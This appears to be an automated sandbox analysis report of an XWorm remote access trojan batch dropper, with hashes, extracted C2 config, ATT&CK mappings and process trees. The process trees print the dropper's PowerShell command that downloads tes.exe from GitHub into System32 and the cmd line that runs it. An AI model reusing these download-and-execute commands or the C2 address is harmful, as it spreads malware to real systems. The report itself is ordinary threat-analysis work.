xworm | fb4ce395283d4dcc0632cddf7ab374aff3e3a03e2871364ea419ddc8deecaad4

Analysis

max time kernel
892s
max time network
900s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
03/03/2025, 20:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

@echo off.bat
Size

809B
MD5

da0c105256eccbca5772fb173b5a313f
SHA1

db0583cd2282aec4f414763cf22d677ec7073f76
SHA256

fb4ce395283d4dcc0632cddf7ab374aff3e3a03e2871364ea419ddc8deecaad4
SHA512

ea2b97998c20ed28f874b83bd15fccfd82dc34a6655988d121c833e5c0352cb4d23c4be1312c0a6863d3629a7d8957de2560fc9be42dfe22c375f937ccee894d

Score

10^/10

xworm defense_evasion discovery execution privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

137.184.74.73:5000

Mutex

fEkivyZANGvej5MK

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0018000000022992-19.dat	family_xworm
behavioral1/memory/3252-20-0x0000000000420000-0x000000000042E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 8 IoCs

flow	pid	Process
59	3328	powershell.exe
62	3328	powershell.exe
250	2944	powershell.exe
251	2944	powershell.exe
252	2944	powershell.exe
253	224	powershell.exe
254	224	powershell.exe
255	224	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3328	powershell.exe
2944	powershell.exe
224	powershell.exe

Downloads MZ/PE file 3 IoCs

flow	pid	Process
62	3328	powershell.exe
252	2944	powershell.exe
255	224	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
3252	tes.exe
5136	tes.exe
2512	tes.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
61	raw.githubusercontent.com
62	raw.githubusercontent.com
252	raw.githubusercontent.com
255	raw.githubusercontent.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\System32\tes.exe	powershell.exe
File created	C:\Windows\System32\tes.exe	powershell.exe
File created	C:\Windows\System32\tes.exe	powershell.exe

Access Token Manipulation: Create Process with Token 1 TTPs 3 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
216	cmd.exe
5108	cmd.exe
3596	cmd.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	tes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	tes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion	tes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate	tes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	tes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	tes.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3328	powershell.exe
3328	powershell.exe
3328	powershell.exe
2944	powershell.exe
2944	powershell.exe
2944	powershell.exe
224	powershell.exe
224	powershell.exe
224	powershell.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeDebugPrivilege	3252	tes.exe
Token: SeBackupPrivilege	1392	svchost.exe
Token: SeRestorePrivilege	1392	svchost.exe
Token: SeSecurityPrivilege	1392	svchost.exe
Token: SeTakeOwnershipPrivilege	1392	svchost.exe
Token: 35	1392	svchost.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	2944	powershell.exe
Token: SeDebugPrivilege	5136	tes.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	224	powershell.exe
Token: SeDebugPrivilege	2512	tes.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe
Token: SeDebugPrivilege	3612	firefox.exe

Suspicious use of FindShellTrayWindow 29 IoCs

pid	Process
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
4676	NOTEPAD.EXE

Suspicious use of SendNotifyMessage 26 IoCs

pid	Process
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe
3612	firefox.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3612	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3160 wrote to memory of 1888	3160	cmd.exe	111
PID 3160 wrote to memory of 1888	3160	cmd.exe	111
PID 1888 wrote to memory of 2304	1888	cmd.exe	112
PID 1888 wrote to memory of 2304	1888	cmd.exe	112
PID 1888 wrote to memory of 3544	1888	cmd.exe	113
PID 1888 wrote to memory of 3544	1888	cmd.exe	113
PID 3160 wrote to memory of 3328	3160	cmd.exe	114
PID 3160 wrote to memory of 3328	3160	cmd.exe	114
PID 3160 wrote to memory of 216	3160	cmd.exe	118
PID 3160 wrote to memory of 216	3160	cmd.exe	118
PID 216 wrote to memory of 3252	216	cmd.exe	119
PID 216 wrote to memory of 3252	216	cmd.exe	119
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 2716 wrote to memory of 3612	2716	firefox.exe	125
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126
PID 3612 wrote to memory of 4620	3612	firefox.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\@echo off.bat"
1⤵
PID:2796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1140

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\@echo off.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3160
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1888
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
    3⤵
    PID:2304
- - C:\Windows\system32\find.exe
    find /i "MD5 hash"
    3⤵
    PID:3544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3328
- C:\Windows\system32\cmd.exe
  cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe"
  2⤵
  - Access Token Manipulation: Create Process with Token
  - Suspicious use of WriteProcessMemory
  PID:216
- - C:\Windows\System32\tes.exe
    "C:\Windows\System32\tes.exe
    3⤵
    - Executes dropped EXE
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious use of AdjustPrivilegeToken
    PID:3252

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\@echo off.bat
1⤵
- Suspicious use of FindShellTrayWindow
PID:4676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3612
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0293a29a-f4b1-4c87-9c2a-ce465b71c2f6} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" gpu
    3⤵
    PID:4620
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2392 -prefsLen 27230 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {673d41ca-40ee-4ecd-aa0b-f339a0b8c346} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" socket
    3⤵
    PID:1168
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3016 -childID 1 -isForBrowser -prefsHandle 3004 -prefMapHandle 3028 -prefsLen 22636 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb93fc2c-1052-453b-a620-b180ba70bfd1} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:3572
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -childID 2 -isForBrowser -prefsHandle 4100 -prefMapHandle 2536 -prefsLen 32604 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52a7a1a8-099e-44a2-b3f1-a81f73666f57} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:2340
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4668 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4832 -prefMapHandle 4672 -prefsLen 32604 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {881adb9e-38b2-4bcf-af64-0a1787bf2105} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" utility
    3⤵
    - Checks processor information in registry
    PID:5292
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5456 -prefMapHandle 1400 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38314d4e-67e3-4c77-81df-9c6676cab2e5} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:3804
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 4 -isForBrowser -prefsHandle 5624 -prefMapHandle 5620 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4431d478-d5f2-4188-a267-9822cd52cf04} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5720 -childID 5 -isForBrowser -prefsHandle 5740 -prefMapHandle 5728 -prefsLen 27114 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5388f0a0-aaaf-493b-a621-dddf9a707e39} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:4296
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6132 -childID 6 -isForBrowser -prefsHandle 6128 -prefMapHandle 6120 -prefsLen 27257 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e2fe8da-a3a1-478e-b8c6-2da196e2b3f8} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:5364
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6396 -childID 7 -isForBrowser -prefsHandle 6372 -prefMapHandle 6388 -prefsLen 27612 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b91d584-a5a3-4422-8d49-637727eddad1} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:5800
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6384 -childID 8 -isForBrowser -prefsHandle 4584 -prefMapHandle 4132 -prefsLen 28044 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7fd3b805-38d2-4664-a873-40c12c068f8f} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:3136
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6620 -childID 9 -isForBrowser -prefsHandle 6632 -prefMapHandle 6628 -prefsLen 28044 -prefMapSize 244628 -jsInitHandle 1192 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38d9d345-89df-45de-8acf-9744c4ab0d8d} 3612 "\\.\pipe\gecko-crash-server-pipe.3612" tab
    3⤵
    PID:5144

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\@echo off.bat" "
1⤵
PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  PID:5844
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
    3⤵
    PID:1620
- - C:\Windows\system32\find.exe
    find /i "MD5 hash"
    3⤵
    PID:3856
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2944
- C:\Windows\system32\cmd.exe
  cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe"
  2⤵
  - Access Token Manipulation: Create Process with Token
  PID:5108
- - C:\Windows\System32\tes.exe
    "C:\Windows\System32\tes.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\@echo off.bat" "
1⤵
PID:5240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5 | find /i "MD5 hash"
  2⤵
  PID:1016
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Pictures\My Wallpaper.jpg" MD5
    3⤵
    PID:6064
- - C:\Windows\system32\find.exe
    find /i "MD5 hash"
    3⤵
    PID:6016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ek4o/injector/raw/main/tes.exe' -OutFile 'C:\Windows\System32\tes.exe'"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Downloads MZ/PE file
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:224
- C:\Windows\system32\cmd.exe
  cmd /min /C "set __COMPAT_LAYER=runasinvoker && start "" "C:\Windows\System32\tes.exe"
  2⤵
  - Access Token Manipulation: Create Process with Token
  PID:3596
- - C:\Windows\System32\tes.exe
    "C:\Windows\System32\tes.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tes.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a2b24af1492f112d2e53cb7415fda39f

SHA1
dbfcee57242a14b60997bd03379cc60198976d85

SHA256
fa05674c1db3386cf01ba1db5a3e9aeb97e15d1720d82988f573bf9743adc073

SHA512
9919077b8e5c7a955682e9a83f6d7ab34ac6a10a3d65af172734d753a48f7604a95739933b8680289c94b4e271b27c775d015b8d9678db277f498d8450b8aff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
27230192efe06f73c3357fb877dcc528

SHA1
51bd05c6de120f9cf702d93dc266df9cc20be265

SHA256
fc43cca3b4332b33f7a36a82097dc5f1e60f5a660aa7726ec0400b43b2e7906b

SHA512
692ec0f45233bd89d7e6753e34aa8a3d70f8feb67d8e543739cb18a169f21c571093203f9bbcbcb9c77b4b53c485bb0876e3258bd4f02bd9ea6be30073a6c09a

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\activity-stream.discovery_stream.json

Filesize
22KB

MD5
82adf10863172a7cddbf9ce2ef202584

SHA1
32000b2013419d48853638f9cc77bdc1d57a7245

SHA256
2e5e19d9a06c619c9ff131c92524c51a7c1fa755a35a65e96e73aa208cb06d3e

SHA512
b3a03e6a9a011d477a8480a01654ddf45ff9027e0b1ef696f91a912d104436b1b73e67c375b1c82f37420e62d90a3362f8ac2e70cd5d9ed0b5a3700629f469e1

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\cache2\doomed\11639

Filesize
13KB

MD5
6722fb022593fa50dbfe2419b4ad9900

SHA1
7f3a1a13e4951fc2dd83d9f2fdf312ef05597b27

SHA256
68a0a3fe9853f5b28215e28effd995d19edb2b89901ad6e656fff02e6ad56ba9

SHA512
6fb9d8cf8d5dacfd34e90bbb29412919b920d3e027103481eaa6c001a01c9814501f7b903dd9dd862f57a5377f97e3b368076afff728b0115c586319126828c8

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\cache2\entries\37F60BA6B36733EF37DC1527FF41F37C3C2B2BC1

Filesize
119KB

MD5
a750f59c2e9f88623cdfec3bf68be7b0

SHA1
ac22b34aed29c33c32b76b92975c52b778ea080e

SHA256
ff22a46781773ec4c74951ab4ddc3797871eeaebd34e27d58c0d227375a34f62

SHA512
a67c1d84312823a230b1408e68ed03481c2b31eeb81f36eaf6a8a1679d817ee7b5ffa81709cf8aa062093a87325123b2d4e192c3a17cef029d559d7a11e03333

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\cache2\entries\3F14AA0A513A2AE72B188531A0E1A363A17A6614

Filesize
34KB

MD5
2b55d80aed1c18eae5349a6cb9e2c75e

SHA1
98f58e0f84b44d42ebb6a3e5e4dd9998b06484ee

SHA256
7f6de6099941fa75c3fe188a984631de791ad58b4e4c91f0ee88a70f1e9b41c4

SHA512
d4da813f47918db348102ce7d7176744bf4a3139573842ea405f949342c5ae91e27e9b805d134af3bc744023805b5bc21169b8f4c0479c9be3b049f463c7af33

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4pbd8fyu.default-release\cache2\entries\5B23235D54208C34AFF88FC6F18585FD8A8F8FAD

Filesize
32KB

MD5
ccc2082423c01800ccefddbe066c36da

SHA1
39e308f07fff561913a5975122b25327032f1240

SHA256
fb2ad6d44107f7a5571dcb7b3a5f9239c4d27e21e29d9dad7d44396b259a4593

SHA512
11922daae8ea7d04371101aed82d2c5c9314ce5773a65b883eceb68e67b16919ef115472d4f5ae3f395afcb1f76e08317cae8907da676d7ba5df069b9193c10f

Download Submit
C:\Users\Admin\AppData\Local\Temp\@echo off.bat

Filesize
809B

MD5
da0c105256eccbca5772fb173b5a313f

SHA1
db0583cd2282aec4f414763cf22d677ec7073f76

SHA256
fb4ce395283d4dcc0632cddf7ab374aff3e3a03e2871364ea419ddc8deecaad4

SHA512
ea2b97998c20ed28f874b83bd15fccfd82dc34a6655988d121c833e5c0352cb4d23c4be1312c0a6863d3629a7d8957de2560fc9be42dfe22c375f937ccee894d

Download Submit
C:\Users\Admin\AppData\Local\Temp\@echo off.bat

Filesize
828B

MD5
450ed388db39503279bbb996a9efcb5e

SHA1
168032bb384f128631eeab320f51eee5e81e5aa7

SHA256
b426771ffa5e67a4eec55b46e21dc6fa18752bb6d2344671e53199a6fd6e6b44

SHA512
4858fb9ff42b20c1a16b16aa76863b81c24c495bc8c7d851fc1386a8575b7b70f51ec6f2b8fe7cb76e14fbdf7ea3bc554a2f5af9c4ebb0fcac62784a4c01df3c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hvxvvx2g.szg.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
